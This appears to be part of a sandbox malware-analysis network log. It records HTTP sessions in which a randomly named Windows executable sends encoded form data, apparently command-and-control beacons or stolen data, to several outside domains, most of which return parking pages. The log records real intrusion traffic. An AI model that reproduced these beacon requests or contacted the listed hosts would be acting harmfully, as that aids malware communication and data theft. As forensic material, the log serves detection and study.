                                                                          Content-Length: 568
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49740 | 217.70.184.50 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:52:31.676389933 CET | 373 | OUT | GET /gnvu/?L2m0Zn=nxCjiJTB74oIWabXQvFQY5//bWyU0Jpkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4FhkS61tyoqX9N8hRwttUIYDPzkdcxTjy0zd8=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.4nk.education
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 12, 2024 08:52:32.486896038 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Tue, 12 Nov 2024 07:52:32 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Content-Security-Policy: default-src 'self'; script-src 'nonce-4066e55e600b429c8e042882065449c3';
                                                                          Vary: Accept-Language
                                                                          Data Ascii: 922<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-4066e55e600b429c8e042882065449c3';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>4nk.education</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article clas
Nov 12, 2024 08:52:32.486912966 CET | 1236 | IN | Data Ascii: s="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=
Nov 12, 2024 08:52:32.486921072 CET | 166 | IN | Data Ascii: Listener('click', (e) => { window.location.replace(atob(e.target.dataset.url) + '4nk.education'); }); });</script></main></div> </body></html>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.4 | 49742 | 199.59.243.227 | 80 | 2060 | C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 08:52:37.872726917 CET | 658 | OUT | POST /ym43/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          Origin: http://www.migraine-massages.pro
                                                                          Referer: http://www.migraine-massages.pro/ym43/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Ascii: L2m0Zn=ozicw38sFOhU+Y1Oi3tuES8Ks+bQEGP5cIFe3zh7eQx5QAUioAT56cQb6Kuk1w8fqaBrIsYQQSnhAyvSGUNbRItaV45npufjml+MIbYSDukn+ohYVcc/TTx4Q9djJLwt8+tTd35aySaHuayRw7yTq7M6Q8RJRs/+Cic/KykqY15O0yis8g86Drqg+H5b1B7kaQ==
Nov 12, 2024 08:52:38.480180979 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:37 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1154
                                                                          x-request-id: 0cc35890-9fb6-4606-9847-c068042f0f86
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                          set-cookie: parking_session=0cc35890-9fb6-4606-9847-c068042f0f86; expires=Tue, 12 Nov 2024 08:07:38 GMT; path=/
                                                                          connection: close
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:38.480201006 CET607INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMGNjMzU4OTAtOWZiNi00NjA2LTk4NDctYzA2ODA0MmYwZjg2IiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          6           192.168.2.4  49749        199.59.243.227  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:52:40.414700985 CET  678                OUT        POST /ym43/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 223
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          Origin: http://www.migraine-massages.pro
                                                                          Referer: http://www.migraine-massages.pro/ym43/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6b 64 35 51 68 6b 69 72 45 2f 35 37 63 51 62 69 36 75 6c 37 51 38 57 71 61 4e 56 49 70 67 51 51 53 7a 68 41 33 72 53 47 43 46 59 52 59 74 59 65 59 35 70 30 65 66 6a 6d 6c 2b 4d 49 62 4e 33 44 75 63 6e 2f 62 35 59 58 39 63 77 65 7a 78 37 52 39 64 6a 44 72 77 70 38 2b 74 31 64 79 52 77 79 58 47 48 75 62 43 52 77 70 61 53 6c 37 4d 67 4e 4d 51 4e 51 2f 69 6f 48 7a 52 4c 50 6a 51 64 62 78 31 4b 78 30 76 32 74 52 64 74 52 72 4f 54 6a 41 77 76 34 43 47 74 42 57 77 46 46 63 62 61 43 7a 66 4a 4f 45 6e 6e 4a 79 5a 74 51 44 30 3d
                                                                          Data Ascii: L2m0Zn=ozicw38sFOhU+4FOgU1uTi8JiebQOmP9cIZe3yU+ekd5QhkirE/57cQbi6ul7Q8WqaNVIpgQQSzhA3rSGCFYRYtYeY5p0efjml+MIbN3Ducn/b5YX9cwezx7R9djDrwp8+t1dyRwyXGHubCRwpaSl7MgNMQNQ/ioHzRLPjQdbx1Kx0v2tRdtRrOTjAwv4CGtBWwFFcbaCzfJOEnnJyZtQD0=
                                                                          Nov 12, 2024 08:52:41.028640985 CET  1236               IN         HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:40 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1154
                                                                          x-request-id: 50048ca5-6c85-4d84-8585-902f8aa8d260
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                          set-cookie: parking_session=50048ca5-6c85-4d84-8585-902f8aa8d260; expires=Tue, 12 Nov 2024 08:07:40 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:41.028656006 CET  607                IN         Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNTAwNDhjYTUtNmM4NS00ZDg0LTg1ODUtOTAyZjhhYThkMjYwIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          7           192.168.2.4  49765        199.59.243.227  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:52:42.970439911 CET  10760              OUT        POST /ym43/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 10303
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          Origin: http://www.migraine-massages.pro
                                                                          Referer: http://www.migraine-massages.pro/ym43/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 6f 7a 69 63 77 33 38 73 46 4f 68 55 2b 34 46 4f 67 55 31 75 54 69 38 4a 69 65 62 51 4f 6d 50 39 63 49 5a 65 33 79 55 2b 65 6c 4a 35 51 58 77 69 72 6c 2f 35 70 4d 51 62 72 61 75 67 37 51 39 55 71 65 70 76 49 70 6b 75 51 51 4c 68 42 52 58 53 58 48 6c 59 65 59 74 59 52 34 35 6f 70 75 65 2b 6d 6c 75 41 49 62 64 33 44 75 63 6e 2f 64 39 59 54 73 63 77 59 7a 78 34 51 39 64 56 4a 4c 77 42 38 34 45 4f 64 79 64 4b 7a 6a 4b 48 76 37 53 52 78 63 75 53 73 37 4d 2b 64 63 51 72 51 2f 76 32 48 33 78 78 50 6a 6c 4b 62 32 39 4b 39 54 65 51 34 6c 56 53 4d 71 2b 37 6a 52 6f 4f 68 6a 53 74 61 42 41 51 4f 39 4c 6f 65 53 65 6d 4d 47 43 4b 55 51 68 5a 4b 6b 6d 39 69 68 72 68 53 4a 69 32 77 50 61 64 61 73 7a 6b 5a 6d 35 49 41 72 37 72 68 73 49 33 6d 70 39 70 6c 50 48 6e 34 77 4a 54 42 5a 71 79 4b 77 4c 59 36 65 64 69 69 73 6b 6b 57 51 39 69 4f 79 46 4c 2f 69 6c 52 6e 39 38 7a 71 73 4d 78 4d 6c 65 57 6a 32 68 56 72 45 45 39 63 34 73 73 79 7a 45 68 57 6a 65 63 72 6c 54 31 45 4a 32 35 73 53 68 4a 56 53 4f [TRUNCATED]
                                                                          Data Ascii: L2m0Zn= [TRUNCATED]
                                                                          Nov 12, 2024 08:52:43.575428963 CET  1236               IN         HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:42 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1154
                                                                          x-request-id: a17c16c4-53c3-4ab2-b7a5-275cdb136990
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==
                                                                          set-cookie: parking_session=a17c16c4-53c3-4ab2-b7a5-275cdb136990; expires=Tue, 12 Nov 2024 08:07:43 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 41 6d 62 6a 76 6a 72 49 78 39 6c 66 66 76 58 4d 75 70 4f 4b 44 6a 57 63 31 59 75 54 47 65 51 64 68 74 36 52 39 5a 66 59 72 45 42 35 70 55 58 51 45 39 4a 4c 4d 64 55 4c 37 2b 4b 57 71 51 44 44 67 62 57 49 34 77 39 36 31 76 34 44 30 46 55 6a 6f 67 47 49 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_AmbjvjrIx9lffvXMupOKDjWc1YuTGeQdht6R9ZfYrEB5pUXQE9JLMdUL7+KWqQDDgbWI4w961v4D0FUjogGIVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:43.575443983 CET  607                IN         Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYTE3YzE2YzQtNTNjMy00YWIyLWI3YTUtMjc1Y2RiMTM2OTkwIiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          8           192.168.2.4  49780        199.59.243.227  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:52:45.504862070 CET  381                OUT        GET /ym43/?L2m0Zn=lxK8zDwlVeZA0KFh+WdBcCErl/7WBlzLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRRroDdY1V9/yZySfQKasoK6wF76Y2cOUueCY=&JPc=NBQdBBkPWTStX HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Connection: close
                                                                          Host: www.migraine-massages.pro
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Nov 12, 2024 08:52:47.113971949 CET  1236               IN         HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:46 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1494
                                                                          x-request-id: 195798bb-9bbb-44f6-803c-b841b01d2087
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zU13rs/HK1AdXfXSfPeRrqRvYTAFGLNDO0ao1fzA501ucKs3rupzQZ1Uvf8nFWqdG9n4zjg+ZnX12cb1mi5vLQ==
                                                                          set-cookie: parking_session=195798bb-9bbb-44f6-803c-b841b01d2087; expires=Tue, 12 Nov 2024 08:07:47 GMT; path=/
                                                                          connection: close
                                                                          Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 7a 55 31 33 72 73 2f 48 4b 31 41 64 58 66 58 53 66 50 65 52 72 71 52 76 59 54 41 46 47 4c 4e 44 4f 30 61 6f 31 66 7a 41 35 30 31 75 63 4b 73 33 72 75 70 7a 51 5a 31 55 76 66 38 6e 46 57 71 64 47 39 6e 34 7a 6a 67 2b 5a 6e 58 31 32 63 62 31 6d 69 35 76 4c 51 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                          Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_zU13rs/HK1AdXfXSfPeRrqRvYTAFGLNDO0ao1fzA501ucKs3rupzQZ1Uvf8nFWqdG9n4zjg+ZnX12cb1mi5vLQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                          Nov 12, 2024 08:52:47.113987923 CET  947                IN         Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                                          Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMTk1Nzk4YmItOWJiYi00NGY2LTgwM2MtYjg0MWIwMWQyMDg3IiwicGFnZV90aW1lIjoxNzMxMzk3OT


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          9           192.168.2.4  49821        199.59.243.227  80                2060  C:\Program Files (x86)\gFdTXZSApDjApVvuJaWPGgNzeHiibtjFvGfRhpkLQjEoIJVEnhBxZtRWYsVXybyvsjROFK\aSgPuBFuPS.exe
                                                                          Timestamp                            Bytes transferred  Direction  Data
                                                                          Nov 12, 2024 08:52:52.594949961 CET  631                OUT        POST /d26j/ HTTP/1.1
                                                                          Accept: */*
                                                                          Accept-Encoding: gzip, deflate
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Content-Length: 203
                                                                          Cache-Control: max-age=0
                                                                          Connection: close
                                                                          Host: www.vnxoso88.art
                                                                          Origin: http://www.vnxoso88.art
                                                                          Referer: http://www.vnxoso88.art/d26j/
                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                          Data Raw: 4c 32 6d 30 5a 6e 3d 2f 52 31 7a 73 2f 69 4b 6d 66 66 2b 47 53 2b 78 4f 46 4f 56 32 44 64 46 58 6c 41 39 30 6a 73 69 55 54 4e 56 55 6a 62 57 77 36 6c 33 42 66 55 50 4d 75 54 56 66 62 6d 77 48 58 59 2f 32 62 71 45 5a 68 59 56 4b 2f 4e 47 6f 51 34 68 4a 6b 64 79 39 64 74 6b 32 57 31 32 4d 78 5a 32 49 33 39 4f 2f 37 45 70 4e 6a 68 63 57 68 52 55 59 70 68 6d 58 5a 52 33 45 68 64 73 45 6e 72 6d 63 6e 55 55 61 38 6b 6a 67 76 71 50 73 52 74 4f 62 52 61 53 39 72 42 48 36 55 37 77 6c 68 45 54 74 57 71 4c 32 2b 59 62 57 6b 71 72 54 5a 77 4e 61 4c 49 70 4d 4b 31 73 38 79 57 65 6f 31 73 39 6d 48 4c 4f 36 51 3d 3d
                                                                          Data Ascii: L2m0Zn=/R1zs/iKmff+GS+xOFOV2DdFXlA90jsiUTNVUjbWw6l3BfUPMuTVfbmwHXY/2bqEZhYVK/NGoQ4hJkdy9dtk2W12MxZ2I39O/7EpNjhcWhRUYphmXZR3EhdsEnrmcnUUa8kjgvqPsRtObRaS9rBH6U7wlhETtWqL2+YbWkqrTZwNaLIpMK1s8yWeo1s9mHLO6Q==
                                                                          Nov 12, 2024 08:52:53.222028017 CET  1236               IN         HTTP/1.1 200 OK
                                                                          date: Tue, 12 Nov 2024 07:52:52 GMT
                                                                          content-type: text/html; charset=utf-8
                                                                          content-length: 1118
                                                                          x-request-id: 032c1e63-0f21-46e0-a698-856107043d0d
                                                                          cache-control: no-store, max-age=0
                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                          vary: sec-ch-prefers-color-scheme
                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_Dw6JfoNMZUCmBAaWO3YQb9Xf3rukE2+VpVrANl90G8AGw/xLUOXRNaKO9cwek6kplwMJ5tKtrTwKs+p1qQGBrw==
                                                                          set-cookie: parking_session=032c1e63-0f21-46e0-a698-856107043d0d; expires=Tue, 12 Nov 2024 08:07:53 GMT; path=/
                                                                          connection: close
